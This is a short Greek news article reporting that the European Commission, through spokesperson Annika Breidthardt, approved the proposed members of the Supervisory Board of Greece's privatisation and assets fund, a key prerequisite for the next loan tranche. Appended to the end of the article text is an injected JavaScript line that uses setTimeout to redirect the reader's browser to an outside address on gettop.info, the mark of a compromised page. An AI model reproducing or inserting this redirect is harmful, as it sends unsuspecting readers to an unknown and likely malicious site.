Σύμφωνη η Κομισιόν με τα μέλη του Εποπτικού Συμβουλίου του Ταμείου

0
9

 

Κατά την ενημέρωση των δημοσιογράφων στις Βρυξέλλες, η εκπρόσωπος της Ευρωπαϊκής Επιτροής, αρμόδια για Οικονομικά θέματα, Ανίκα Μπράιτχαρτ δήλωσε πως «η Κομισιόν επικοινώνησε στις ελληνικές αρχές τη σύμφωνη γνώμη της για τα προτεινόμενα υποψήφια μέλη του Εποπτικού Συμβουλίου του Ταμείου».

Όπως προσέθεσε η ίδια, ο διορισμός των μελών του Εποπτικού Συμβουλίου της Ελληνικής Εταιρείας Συμμετοχών και Περιουσίας ήταν ένα από τα «προαπαιτούμενα-κλειδιά» για την εκταμίευση της επόμενης υποδόσης, ενώ υπογράμμισε πως το επόμενο βήμα είναι η συγκρότηση του Διοικητικού Συμβουλίου, του οποίου τα μέλη θα πρέπει να «ενσωματώνουν τις υψηλότερες προδιαγραφές διακυβέρνησης και ανεξαρτησίας».

Επιπλέον, η Ανίκα Μπράιτχαρντ δεν θέλησε να προβεί σε «εικασίες» για το ποιες εταιρείες θα περιληφθούν σε αυτό το Ταμείο, εφόσον δεν έχει ακόμη συγκροτηθεί το ΔΣ, τονίζοντας, ακόμη, πως η λειτουργία του Ταμείου θα είναι απόλυτα «συμβατή με τη συμφωνία της περασμένης χρονιάς». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here